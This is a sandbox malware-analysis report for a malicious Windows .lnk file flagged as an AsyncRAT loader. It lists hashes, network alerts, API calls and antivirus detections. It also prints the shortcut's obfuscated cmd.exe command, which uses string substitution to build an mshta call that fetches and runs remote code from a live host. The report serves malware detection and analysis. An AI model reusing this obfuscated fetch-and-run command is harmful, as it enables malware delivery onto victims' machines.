Summary | ZeroBOX

notice_may.3_23377.lnk

Generic Malware, OS Processor Check, AntiVM, AntiDebug, GIF Format
Category FILE
Machine s1_win7_x6403_us
Started May 4, 2023, 10:04 a.m.
Completed May 4, 2023, 10:06 a.m.
Size 75.7KB
Type MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=13, Archive, ctime=Fri Apr 9 04:50:10 2021, mtime=Tue May 2 06:05:31 2023, atime=Fri Apr 9 04:50:10 2021, length=289792, window=hidenormalshowminimized
MD5 af543d8033c932f504f309c0d9760cbc
SHA256 e6f07bf2d3a44eefe22b64ecb5513a6cad5039df5fe055afff6a5c5098750265
CRC32 FD0EAAA9
ssdeep 1536:fG+sVOVnebn0wC0eklKuikz1sZugWkWphQzuW6:BLeYoGkz1s2kWpKb6
Yara
  • OS_Processor_Check_Zero - OS Processor Check
  • Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT
  • Lnk_Format_Zero - LNK Format
  • Generic_Malware_Zero - Generic Malware

Name Response
corporacionhardsoft.com 192.3.201.85

IP Address Status
164.124.101.2 Active
192.3.201.85 Active

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49165 -> 192.3.201.85:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49165 -> 192.3.201.85:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49165 -> 192.3.201.85:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.3.201.85:443 -> 192.168.56.103:49165 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.3.201.85:443 -> 192.168.56.103:49165 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49166 -> 192.3.201.85:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49166 -> 192.3.201.85:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49166 -> 192.3.201.85:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.3.201.85:443 -> 192.168.56.103:49166 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.3.201.85:443 -> 192.168.56.103:49166 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49168 -> 192.3.201.85:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49168 -> 192.3.201.85:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.3.201.85:443 -> 192.168.56.103:49168 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.3.201.85:443 -> 192.168.56.103:49168 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode

Suricata TLS

No Suricata TLS

API: GlobalMemoryStatusEx
Arguments: (none)
Status: 1, Return: 1, Repeated: 0

file C:\Users\test22\AppData\Local\Temp\notice_may.3_23377.lnk
cmdline mshta https://corporacionhardsoft.com/x/file.html
cmdline "C:\Windows\System32\cmd.exe" cmd.exe /V:ON/C"set vEzl=mshty httYxs7jjcorYxorycionhyrdsoft.comjxjfile.html&&set SfE=!vEzl:Yx=p!&&set gu=!SfE:y=a!&&set 9qk=!gu:j=/!&&set vwp=!9qk:7=:!&&call %vwp%"
API: NtProtectVirtualMemory
Arguments:
  process_identifier: 2276
  stack_dep_bypass: 0
  stack_pivoted: 0
  heap_dep_bypass: 1
  length: 4096
  protection: 32 (PAGE_EXECUTE_READ)
  base_address: 0x7ef80000
  process_handle: 0xffffffff
Status: 1, Return: 0, Repeated: 0

  • DebuggerCheck__GlobalFlags - (no description)
  • DebuggerCheck__QueryInfo - (no description)
  • DebuggerHiding__Thread - (no description)
  • DebuggerHiding__Active - (no description)
  • DebuggerException__SetConsoleCtrl - (no description)
  • ThreadControl__Context - (no description)
  • SEH__vectored - (no description)
  • anti_dbg - Checks if being debugged
  • disable_dep - Bypass DEP

API: RegSetValueExA
Arguments:
  key_handle: 0x000002bc
  regkey_r: ProxyEnable
  reg_type: 4 (REG_DWORD)
  value: 0
  regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
Status: 1, Return: 0, Repeated: 0

FireEye Heur.BZC.YAX.Pantera.117.25B8D75D
ALYac Heur.BZC.YAX.Pantera.117.25B8D75D
VIPRE Heur.BZC.YAX.Pantera.117.25B8D75D
Arcabit Heur.BZC.YAX.Pantera.117.25B8D75D
Kaspersky HEUR:Trojan.WinLNK.Agent.gen
BitDefender Heur.BZC.YAX.Pantera.117.25B8D75D
MicroWorld-eScan Heur.BZC.YAX.Pantera.117.25B8D75D
Emsisoft Heur.BZC.YAX.Pantera.117.25B8D75D (B)
TrendMicro HEUR_LNKEXEC.A
SentinelOne Static AI - Suspicious LNK
Microsoft Trojan:Script/Wacatac.B!ml
ZoneAlarm HEUR:Trojan.WinLNK.Agent.gen
GData Heur.BZC.YAX.Pantera.117.25B8D75D
Google Detected
MAX malware (ai score=88)
VBA32 Trojan.Link.DoubleRun
Zoner Probably Heur.LNKScript
Rising Trojan.Starter/LNK!1.BE88 (CLASSIC)
Ikarus Trojan.LNK.Agent
Process injection: Process 1020 resumed a thread in remote process 2168

API: NtResumeThread
Arguments:
  thread_handle: 0x000002ec
  suspend_count: 1
  process_identifier: 2168
Status: 1, Return: 0, Repeated: 0